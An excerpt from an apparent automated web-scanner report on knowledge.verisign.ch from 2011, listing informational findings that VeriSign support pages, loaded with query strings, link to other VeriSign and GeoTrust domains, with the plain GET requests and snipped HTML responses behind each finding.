GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
</a> <a style="margin: 5px 10px 0pt 0pt; display: block; font-weight: bold; float: left; background-image: url("/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif"); width: 75px; color: rgb(255, 255, 255); line-height: 24px; height: 24px; text-align: center; text-decoration: none;" href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP">SEARCH</a>
...[SNIP]...
<li><a href="https://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_self">Report Code Signing Misuse</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://digitalid.verisign.com/client/retrieve_id.htm
https://digitalid.verisign.com/services/client/index.html
https://digitalid.verisign.com/services/client/renew.htm
https://digitalid.verisign.com/services/client/replace.htm
https://digitalid.verisign.com/services/client/revoke.htm
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
</h4>
<a href="https://digitalid.verisign.com/services/client/renew.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">RENEW</a> <a href="https://digitalid.verisign.com/services/client/revoke.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">REVOKE</a> <a href="https://digitalid.verisign.com/services/client/replace.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">REPLACE</a> <a href="https://digitalid.verisign.com/services/client/index.html" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(255,255,255); line-height: 24px; height: 24px; text-align: center; text-decoration: none">SEARCH</a> <a href="https://digitalid.verisign.com/client/retrieve_id.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none">RETRIEVE</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.9. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://onsite-admin.verisign.com/OnSiteHome.htm
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<br/>


                           <a href="https://onsite-admin.verisign.com/OnSiteHome.htm">
                               <img src="apps/infocenter/resources/images/signin-button.gif" alt="Sign In"/>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
